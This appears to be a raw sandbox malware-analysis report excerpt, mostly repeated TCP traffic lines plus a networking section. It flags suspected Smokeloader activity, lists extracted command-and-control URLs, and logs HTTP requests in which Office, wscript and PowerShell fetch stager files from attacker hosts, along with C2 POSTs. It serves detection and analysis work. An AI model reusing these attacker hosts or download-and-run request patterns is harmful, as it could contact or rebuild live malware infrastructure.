            Source: global trafficTCP traffic: 198.46.177.156:80 -> 192.168.2.22:49173
            Source: global trafficTCP traffic: 198.46.177.156:80 -> 192.168.2.22:49173
            Source: global trafficTCP traffic: 192.168.2.22:49173 -> 198.46.177.156:80
            Source: global trafficTCP traffic: 192.168.2.22:49173 -> 198.46.177.156:80
            Source: global trafficTCP traffic: 198.46.177.156:80 -> 192.168.2.22:49173
            Source: global trafficTCP traffic: 198.46.177.156:80 -> 192.168.2.22:49173
            Source: global trafficTCP traffic: 198.46.177.156:80 -> 192.168.2.22:49173
            Source: global trafficTCP traffic: 198.46.177.156:80 -> 192.168.2.22:49173
            Source: global trafficTCP traffic: 192.168.2.22:49173 -> 198.46.177.156:80
            Source: global trafficTCP traffic: 198.46.177.156:80 -> 192.168.2.22:49173
            Source: global trafficTCP traffic: 192.168.2.22:49173 -> 198.46.177.156:80
            Source: global trafficTCP traffic: 192.168.2.22:49173 -> 198.46.177.156:80
            Source: global trafficTCP traffic: 192.168.2.22:49173 -> 198.46.177.156:80
            Source: global trafficTCP traffic: 198.46.177.156:80 -> 192.168.2.22:49173
            Source: global trafficTCP traffic: 198.46.177.156:80 -> 192.168.2.22:49173
            Source: global trafficTCP traffic: 198.46.177.156:80 -> 192.168.2.22:49173
            Source: global trafficTCP traffic: 192.168.2.22:49173 -> 198.46.177.156:80
            Source: global trafficTCP traffic: 192.168.2.22:49173 -> 198.46.177.156:80
            Source: global trafficTCP traffic: 198.46.177.156:80 -> 192.168.2.22:49173
            Source: global trafficTCP traffic: 198.46.177.156:80 -> 192.168.2.22:49173
            Source: global trafficTCP traffic: 198.46.177.156:80 -> 192.168.2.22:49173
            Source: global trafficTCP traffic: 198.46.177.156:80 -> 192.168.2.22:49173
            Source: global trafficTCP traffic: 198.46.177.156:80 -> 192.168.2.22:49173
            Source: global trafficTCP traffic: 198.46.177.156:80 -> 192.168.2.22:49173
            Source: global trafficTCP traffic: 198.46.177.156:80 -> 192.168.2.22:49173
            Source: global trafficTCP traffic: 192.168.2.22:49173 -> 198.46.177.156:80
            Source: global trafficTCP traffic: 198.46.177.156:80 -> 192.168.2.22:49173
            Source: global trafficTCP traffic: 198.46.177.156:80 -> 192.168.2.22:49173
            Source: global trafficTCP traffic: 198.46.177.156:80 -> 192.168.2.22:49173
            Source: global trafficTCP traffic: 192.168.2.22:49173 -> 198.46.177.156:80
            Source: global trafficTCP traffic: 192.168.2.22:49173 -> 198.46.177.156:80
            Source: global trafficTCP traffic: 192.168.2.22:49173 -> 198.46.177.156:80
            Source: global trafficTCP traffic: 192.168.2.22:49173 -> 198.46.177.156:80
            Source: global trafficTCP traffic: 198.46.177.156:80 -> 192.168.2.22:49173
            Source: global trafficTCP traffic: 198.46.177.156:80 -> 192.168.2.22:49173
            Source: global trafficTCP traffic: 198.46.177.156:80 -> 192.168.2.22:49173
            Source: global trafficTCP traffic: 198.46.177.156:80 -> 192.168.2.22:49173
            Source: global trafficTCP traffic: 198.46.177.156:80 -> 192.168.2.22:49173
            Source: global trafficTCP traffic: 192.168.2.22:49173 -> 198.46.177.156:80
            Source: global trafficTCP traffic: 198.46.177.156:80 -> 192.168.2.22:49173
            Source: global trafficTCP traffic: 192.168.2.22:49173 -> 198.46.177.156:80
            Source: global trafficTCP traffic: 198.46.177.156:80 -> 192.168.2.22:49173
            Source: global trafficTCP traffic: 192.168.2.22:49173 -> 198.46.177.156:80
            Source: global trafficTCP traffic: 192.168.2.22:49173 -> 198.46.177.156:80
            Source: global trafficTCP traffic: 198.46.177.156:80 -> 192.168.2.22:49173
            Source: global trafficTCP traffic: 198.46.177.156:80 -> 192.168.2.22:49173
            Source: global trafficTCP traffic: 198.46.177.156:80 -> 192.168.2.22:49173
            Source: global trafficTCP traffic: 192.168.2.22:49173 -> 198.46.177.156:80
            Source: global trafficTCP traffic: 198.46.177.156:80 -> 192.168.2.22:49173
            Source: global trafficTCP traffic: 198.46.177.156:80 -> 192.168.2.22:49173
            Source: global trafficTCP traffic: 192.168.2.22:49173 -> 198.46.177.156:80
            Source: global trafficTCP traffic: 198.46.177.156:80 -> 192.168.2.22:49173
            Source: global trafficTCP traffic: 198.46.177.156:80 -> 192.168.2.22:49173
            Source: global trafficTCP traffic: 192.168.2.22:49173 -> 198.46.177.156:80
            Source: global trafficTCP traffic: 198.46.177.156:80 -> 192.168.2.22:49173
            Source: global trafficTCP traffic: 198.46.177.156:80 -> 192.168.2.22:49173
            Source: global trafficTCP traffic: 192.168.2.22:49173 -> 198.46.177.156:80
            Source: global trafficTCP traffic: 198.46.177.156:80 -> 192.168.2.22:49173
            Source: global trafficTCP traffic: 198.46.177.156:80 -> 192.168.2.22:49173
            Source: global trafficTCP traffic: 192.168.2.22:49173 -> 198.46.177.156:80
            Source: global trafficTCP traffic: 198.46.177.156:80 -> 192.168.2.22:49173
            Source: global trafficTCP traffic: 192.168.2.22:49173 -> 198.46.177.156:80
            Source: global trafficTCP traffic: 198.46.177.156:80 -> 192.168.2.22:49173
            Source: global trafficTCP traffic: 192.168.2.22:49173 -> 198.46.177.156:80
            Source: global trafficTCP traffic: 192.168.2.22:49173 -> 198.46.177.156:80
            Source: global trafficTCP traffic: 198.46.177.156:80 -> 192.168.2.22:49173
            Source: global trafficTCP traffic: 198.46.177.156:80 -> 192.168.2.22:49173
            Source: global trafficTCP traffic: 198.46.177.156:80 -> 192.168.2.22:49173
            Source: global trafficTCP traffic: 198.46.177.156:80 -> 192.168.2.22:49173
            Source: global trafficTCP traffic: 198.46.177.156:80 -> 192.168.2.22:49173
            Source: global trafficTCP traffic: 192.168.2.22:49173 -> 198.46.177.156:80
            Source: global trafficTCP traffic: 198.46.177.156:80 -> 192.168.2.22:49173
            Source: global trafficTCP traffic: 192.168.2.22:49173 -> 198.46.177.156:80
            Source: global trafficTCP traffic: 198.46.177.156:80 -> 192.168.2.22:49173
            Source: global trafficTCP traffic: 198.46.177.156:80 -> 192.168.2.22:49173
            Source: global trafficTCP traffic: 192.168.2.22:49173 -> 198.46.177.156:80
            Source: global trafficTCP traffic: 198.46.177.156:80 -> 192.168.2.22:49173
            Source: global trafficTCP traffic: 198.46.177.156:80 -> 192.168.2.22:49173
            Source: global trafficTCP traffic: 192.168.2.22:49173 -> 198.46.177.156:80
            Source: global trafficTCP traffic: 192.168.2.22:49173 -> 198.46.177.156:80
            Source: global trafficTCP traffic: 198.46.177.156:80 -> 192.168.2.22:49173
            Source: global trafficTCP traffic: 198.46.177.156:80 -> 192.168.2.22:49173
            Source: global trafficTCP traffic: 198.46.177.156:80 -> 192.168.2.22:49173
            Source: global trafficTCP traffic: 198.46.177.156:80 -> 192.168.2.22:49173
            Source: global trafficTCP traffic: 198.46.177.156:80 -> 192.168.2.22:49173
            Source: global trafficTCP traffic: 192.168.2.22:49173 -> 198.46.177.156:80
            Source: global trafficTCP traffic: 198.46.177.156:80 -> 192.168.2.22:49173
            Source: global trafficTCP traffic: 198.46.177.156:80 -> 192.168.2.22:49173
            Source: global trafficTCP traffic: 192.168.2.22:49173 -> 198.46.177.156:80
            Source: global trafficTCP traffic: 198.46.177.156:80 -> 192.168.2.22:49173
            Source: global trafficTCP traffic: 192.168.2.22:49173 -> 198.46.177.156:80
            Source: global trafficTCP traffic: 198.46.177.156:80 -> 192.168.2.22:49173
            Source: global trafficTCP traffic: 198.46.177.156:80 -> 192.168.2.22:49173
            Source: global trafficTCP traffic: 192.168.2.22:49173 -> 198.46.177.156:80
            Source: global trafficTCP traffic: 192.168.2.22:49173 -> 198.46.177.156:80
            Source: global trafficTCP traffic: 198.46.177.156:80 -> 192.168.2.22:49173
            Source: global trafficTCP traffic: 198.46.177.156:80 -> 192.168.2.22:49173
            Source: global trafficTCP traffic: 198.46.177.156:80 -> 192.168.2.22:49173
            Source: global trafficTCP traffic: 192.168.2.22:49173 -> 198.46.177.156:80
            Source: global trafficTCP traffic: 192.168.2.22:49173 -> 198.46.177.156:80
            Source: global trafficTCP traffic: 192.168.2.22:49173 -> 198.46.177.156:80
            Source: global trafficTCP traffic: 192.168.2.22:49174 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49174
            Source: global trafficTCP traffic: 192.168.2.22:49174 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49174 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49174
            Source: global trafficTCP traffic: 192.168.2.22:49173 -> 198.46.177.156:80
            Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49174
            Source: global trafficTCP traffic: 192.168.2.22:49174 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49174 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49174
            Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49174
            Source: global trafficTCP traffic: 192.168.2.22:49174 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49174 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49174
            Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49174
            Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49174
            Source: global trafficTCP traffic: 192.168.2.22:49174 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49174
            Source: global trafficTCP traffic: 192.168.2.22:49174 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49174 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49174
            Source: global trafficTCP traffic: 192.168.2.22:49174 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49174
            Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49174
            Source: global trafficTCP traffic: 192.168.2.22:49174 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49174
            Source: global trafficTCP traffic: 192.168.2.22:49174 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49174 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49174
            Source: global trafficTCP traffic: 192.168.2.22:49174 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49174
            Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49174
            Source: global trafficTCP traffic: 192.168.2.22:49174 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49174
            Source: global trafficTCP traffic: 192.168.2.22:49174 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49174 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49174
            Source: global trafficTCP traffic: 192.168.2.22:49174 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49174
            Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49174
            Source: global trafficTCP traffic: 192.168.2.22:49174 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49174 -> 188.114.97.3:443

            Networking

            barindex
            Source: TrafficSnort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.22:49178 -> 77.232.129.190:80
            Source: C:\Windows\SysWOW64\explorer.exeNetwork Connect: 77.232.129.190 80Jump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeNetwork Connect: 188.114.97.3 443Jump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeDomain query: paste.ee
            Source: C:\Windows\SysWOW64\explorer.exeDomain query: prolinice.ga
            Source: Malware configuration extractorURLs: http://prolinice.ga/index.php
            Source: Malware configuration extractorURLs: http://vilendar.ga/index.php
            Source: unknownDNS query: name: paste.ee
            Source: Yara matchFile source: 12.2.powershell.exe.9260000.1.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0000000C.00000002.494209525.0000000009260000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
            Source: global trafficHTTP traffic detected: GET /images/004/785/720/original/new_image.jpg?1716307634 HTTP/1.1Host: uploaddeimagens.com.brConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /images/004/785/720/original/new_image.jpg?1716307634 HTTP/1.1Host: uploaddeimagens.com.br
            Source: global trafficHTTP traffic detected: GET /8080/RBG.txt HTTP/1.1Host: 198.46.177.156Connection: Keep-Alive
            Source: Joe Sandbox ViewIP Address: 54.241.153.192 54.241.153.192
            Source: Joe Sandbox ViewIP Address: 188.114.97.3 188.114.97.3
            Source: Joe Sandbox ViewIP Address: 188.114.97.3 188.114.97.3
            Source: Joe Sandbox ViewASN Name: AMAZON-02US AMAZON-02US
            Source: Joe Sandbox ViewASN Name: BSTV-ASRU BSTV-ASRU
            Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
            Source: Joe Sandbox ViewASN Name: AS-COLOCROSSINGUS AS-COLOCROSSINGUS
            Source: Joe Sandbox ViewJA3 fingerprint: 05af1f5ca1b87cc9cc9b25185115607d
            Source: Joe Sandbox ViewJA3 fingerprint: 7dcce5b76c8b17472d024758970a406b
            Source: global trafficHTTP traffic detected: GET /d/oTxeD HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: paste.eeConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /zBOD HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: z2.inkConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xampp/msdc/ms/lionsarebeautifultoruletheforestandtheyalwayskingogthejunglewhoneverknowmanythingkingisrigerbutlionisthekingo__junglelionbeautiufl.doc HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 198.46.177.156Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /9090/lionsarekingofjungleimageshere.bmp HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 198.46.177.156Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://mbhaudjprbp.net/User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 275Host: prolinice.ga
            Source: global trafficHTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://prolinice.ga/User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 1395Host: prolinice.ga
            Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.22:49175 version: TLS 1.0
            Source: unknownTCP traffic detected without corresponding DNS query: 198.46.177.156
            Source: unknownTCP traffic detected without corresponding DNS query: 198.46.177.156
            Source: unknownTCP traffic detected without corresponding DNS query: 198.46.177.156
            Source: unknownTCP traffic detected without corresponding DNS query: 198.46.177.156
            Source: unknownTCP traffic detected without corresponding DNS query: 198.46.177.156
            Source: unknownTCP traffic detected without corresponding DNS query: 198.46.177.156
            Source: unknownTCP traffic detected without corresponding DNS query: 198.46.177.156
            Source: unknownTCP traffic detected without corresponding DNS query: 198.46.177.156
            Source: unknownTCP traffic detected without corresponding DNS query: 198.46.177.156
            Source: unknownTCP traffic detected without corresponding DNS query: 198.46.177.156
            Source: unknownTCP traffic detected without corresponding DNS query: 198.46.177.156
            Source: unknownTCP traffic detected without corresponding DNS query: 198.46.177.156
            Source: unknownTCP traffic detected without corresponding DNS query: 198.46.177.156
            Source: unknownTCP traffic detected without corresponding DNS query: 198.46.177.156
            Source: unknownTCP traffic detected without corresponding DNS query: 198.46.177.156
            Source: unknownTCP traffic detected without corresponding DNS query: 198.46.177.156
            Source: unknownTCP traffic detected without corresponding DNS query: 198.46.177.156
            Source: unknownTCP traffic detected without corresponding DNS query: 198.46.177.156
            Source: unknownTCP traffic detected without corresponding DNS query: 198.46.177.156
            Source: unknownTCP traffic detected without corresponding DNS query: 198.46.177.156
            Source: unknownTCP traffic detected without corresponding DNS query: 198.46.177.156
            Source: unknownTCP traffic detected without corresponding DNS query: 198.46.177.156
            Source: unknownTCP traffic detected without corresponding DNS query: 198.46.177.156
            Source: unknownTCP traffic detected without corresponding DNS query: 198.46.177.156
            Source: unknownTCP traffic detected without corresponding DNS query: 198.46.177.156
            Source: unknownTCP traffic detected without corresponding DNS query: 198.46.177.156
            Source: unknownTCP traffic detected without corresponding DNS query: 198.46.177.156
            Source: unknownTCP traffic detected without corresponding DNS query: 198.46.177.156
            Source: unknownTCP traffic detected without corresponding DNS query: 198.46.177.156
            Source: unknownTCP traffic detected without corresponding DNS query: 198.46.177.156
            Source: unknownTCP traffic detected without corresponding DNS query: 198.46.177.156
            Source: unknownTCP traffic detected without corresponding DNS query: 198.46.177.156
            Source: unknownTCP traffic detected without corresponding DNS query: 198.46.177.156
            Source: unknownTCP traffic detected without corresponding DNS query: 198.46.177.156
            Source: unknownTCP traffic detected without corresponding DNS query: 198.46.177.156
            Source: unknownTCP traffic detected without corresponding DNS query: 198.46.177.156
            Source: unknownTCP traffic detected without corresponding DNS query: 198.46.177.156
            Source: unknownTCP traffic detected without corresponding DNS query: 198.46.177.156
            Source: unknownTCP traffic detected without corresponding DNS query: 198.46.177.156
            Source: unknownTCP traffic detected without corresponding DNS query: 198.46.177.156
            Source: unknownTCP traffic detected without corresponding DNS query: 198.46.177.156
            Source: unknownTCP traffic detected without corresponding DNS query: 198.46.177.156
            Source: unknownTCP traffic detected without corresponding DNS query: 198.46.177.156
            Source: unknownTCP traffic detected without corresponding DNS query: 198.46.177.156
            Source: unknownTCP traffic detected without corresponding DNS query: 198.46.177.156
            Source: unknownTCP traffic detected without corresponding DNS query: 198.46.177.156
            Source: unknownTCP traffic detected without corresponding DNS query: 198.46.177.156
            Source: unknownTCP traffic detected without corresponding DNS query: 198.46.177.156
            Source: unknownTCP traffic detected without corresponding DNS query: 198.46.177.156
            Source: unknownTCP traffic detected without corresponding DNS query: 198.46.177.156
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\715A8D75.emfJump to behavior
            Source: global trafficHTTP traffic detected: GET /d/oTxeD HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: paste.eeConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /images/004/785/720/original/new_image.jpg?1716307634 HTTP/1.1Host: uploaddeimagens.com.brConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /images/004/785/720/original/new_image.jpg?1716307634 HTTP/1.1Host: uploaddeimagens.com.br
            Source: global trafficHTTP traffic detected: GET /zBOD HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: z2.inkConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xampp/msdc/ms/lionsarebeautifultoruletheforestandtheyalwayskingogthejunglewhoneverknowmanythingkingisrigerbutlionisthekingo__junglelionbeautiufl.doc HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 198.46.177.156Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /9090/lionsarekingofjungleimageshere.bmp HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 198.46.177.156Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /8080/RBG.txt HTTP/1.1Host: 198.46.177.156Connection: Keep-Alive
            Source: wscript.exe, 00000009.00000003.424493322.0000000003210000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.423160214.000000000320E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.423208431.0000000003211000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)
            Source: global trafficDNS traffic detected: DNS query: z2.ink
            Source: global trafficDNS traffic detected: DNS query: paste.ee
            Source: global trafficDNS traffic detected: DNS query: uploaddeimagens.com.br
            Source: global trafficDNS traffic detected: DNS query: prolinice.ga
            Source: unknownHTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://mbhaudjprbp.net/User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 275Host: prolinice.ga
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Edge: smart-1.high-performance.networkDate: Tue, 28 May 2024 07:30:01 GMTContent-Length: 102317Server: LINKSGPTCache-Control: no-store, no-cache, must-revalidateConnection: keep-aliveData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 0a 6c 61 6e 67 3d 65 6e 2d 55 53 20 70 72 65 66 69 78 3d 22 6f 67 3a 20 68 74 74 70 73 3a 2f 2f 6f 67 70 2e 6d 65 2f 6e 73 23 22 3e 3c 68 65 61 64 3e 3c 73 74 79 6c 65 3e 69 6d 67 2e 6c 61 7a 79 7b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 70 78 7d 3c 2f 73 74 79 6c 65 3e 3c 6c 69 6e 6b 0a 72 65 6c 3d 70 72 65 6c 6f 61 64 20 68 72 65 66 3d 68 74 74 70 73 3a 2f 2f 64 33 62 74 72 68 65 79 65 6a 6d 69 76 79 2e 63 6c 6f 75 64 66 72 6f 6e 74 2e 6e 65 74 2f 65 64 67 65 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 70 6c 75 67 69 6e 73 2f 77 33 2d 74 6f 74 61 6c 2d 63 61 63 68 65 2f 70 75 62 2f 6a 73 2f 6c 61 7a 79 6c 6f 61 64 2e 6d 69 6e 2e 6a 73 20 61 73 3d 73 63 72 69 70 74 3e 3c 6d 65 74 61 0a 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 3c 6d 65 74 61 0a 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 3c 6c 69 6e 6b 0a 72 65 6c 3d 70 69 6e 67 62 61 63 6b 20 68 72 65 66 3d 68 74 74 70 73 3a 2f 2f 66 61 63 65 2e 6c 69 6e 6b 73 67 70 74 2e 63 6f 6d 2f 65 64 67 65 2f 78 6d 6c 72 70 63 2e 70 68 70 3e 20 3c 73 63 72 69 70 74 3e 64 6f 63 75 6d 65 6e 74 2e 64 6f 63 75 6d 65 6e 74 45 6c 65 6d 65 6e 74 2e 63 6c 61 73 73 4e 61 6d 65 20 3d 20 27 6a 73 27 3b 3c 2f 73 63 72 69 70 74 3e 20 3c 6c 69 6e 6b 0a 72 65 6c 3d 70 72 65 63 6f 6e 6e 65 63 74 20 68 72 65 66 3d 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 73 74 61 74 69 63 2e 63 6f 6d 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 3c 73 74 79 6c 65 20 69 64 3d 65 74 2d 64 69 76 69 2d 6f 70 65 6e 2d 73 61 6e 73 2d 69 6e 6c 69 6e 65 2d 63 73 73 3e 2f 2a 3c 21 5b 43 44 41 54 41 5b 2a 2f 2f 2a 20 4f 72 69 67 69 6e 61 6c 3a 20 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 4f 70 65 6e 2b 53 61 6e 73 3a 33 30 30 69 74 61 6c 69 63 2c 34 30 30 69 74 61 6c 69 63 2c 36 30 30 69 74 61 6c 69 63 2c 37 30 30 69 74 61 6c 69 63 2c 38 30 30 69 74 61 6c 69 63 2c 34 30 30 2c 33 30 30 2c 36 30 30 2c 37 30 30 2c 38 30 30 26 23 30 33 38 3b 73 75 62 73 65 74 3d 6c 61 74 69 6e 2c 6c 61 74 69 6e 2d 65 78 74 26 23 30 33 38 3b 64 69 73 70 6c 61 79 3d 73 77 61 70 20 2a 2f 2f 2a 20 55 73 65 72 20 41 67 65 6e 74 3a 20 4d 6f 7a 69 6c 6c 61 2f 35 2e 30 20 28 55 6e 6b 6e 6f 77 6e 3b 20 4c 69 6e 75 78 20 78 38 36 5f 36 34 29 20 41 70 70 6c 65 57 65 62 4b 69 74 2f 35 33 38 2e 31 20 28 4b 48 54 4d 4c 2c 20 6c 69 6b 65 20 47 65 63 6b 6f 29 20 53 61 66 61 72 69 2f 35 33 38 2e 31 20 44 61 75 6d 2f 34 2e 31 20 2a 2f 40 66 6f 6e 74 2d 66 61 63 65 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 27 4f 70 65 6e 20 53 61 6e 73 27 3b 66 6f 6e 74 2d 73 74 79 6c 65 3a 20 69 74 61 6c 69 63 3b 6
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Edge: smart-1.high-performance.networkDate: Tue, 28 May 2024 07:30:02 GMTContent-Length: 102317Server: LINKSGPTCache-Control: no-store, no-cache, must-revalidateConnection: keep-aliveData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 0a 6c 61 6e 67 3d 65 6e 2d 55 53 20 70 72 65 66 69 78 3d 22 6f 67 3a 20 68 74 74 70 73 3a 2f 2f 6f 67 70 2e 6d 65 2f 6e 73 23 22 3e 3c 68 65 61 64 3e 3c 73 74 79 6c 65 3e 69 6d 67 2e 6c 61 7a 79 7b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 70 78 7d 3c 2f 73 74 79 6c 65 3e 3c 6c 69 6e 6b 0a 72 65 6c 3d 70 72 65 6c 6f 61 64 20 68 72 65 66 3d 68 74 74 70 73 3a 2f 2f 64 33 62 74 72 68 65 79 65 6a 6d 69 76 79 2e 63 6c 6f 75 64 66 72 6f 6e 74 2e 6e 65 74 2f 65 64 67 65 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 70 6c 75 67 69 6e 73 2f 77 33 2d 74 6f 74 61 6c 2d 63 61 63 68 65 2f 70 75 62 2f 6a 73 2f 6c 61 7a 79 6c 6f 61 64 2e 6d 69 6e 2e 6a 73 20 61 73 3d 73 63 72 69 70 74 3e 3c 6d 65 74 61 0a 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 3c 6d 65 74 61 0a 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 3c 6c 69 6e 6b 0a 72 65 6c 3d 70 69 6e 67 62 61 63 6b 20 68 72 65 66 3d 68 74 74 70 73 3a 2f 2f 66 61 63 65 2e 6c 69 6e 6b 73 67 70 74 2e 63 6f 6d 2f 65 64 67 65 2f 78 6d 6c 72 70 63 2e 70 68 70 3e 20 3c 73 63 72 69 70 74 3e 64 6f 63 75 6d 65 6e 74 2e 64 6f 63 75 6d 65 6e 74 45 6c 65 6d 65 6e 74 2e 63 6c 61 73 73 4e 61 6d 65 20 3d 20 27 6a 73 27 3b 3c 2f 73 63 72 69 70 74 3e 20 3c 6c 69 6e 6b 0a 72 65 6c 3d 70 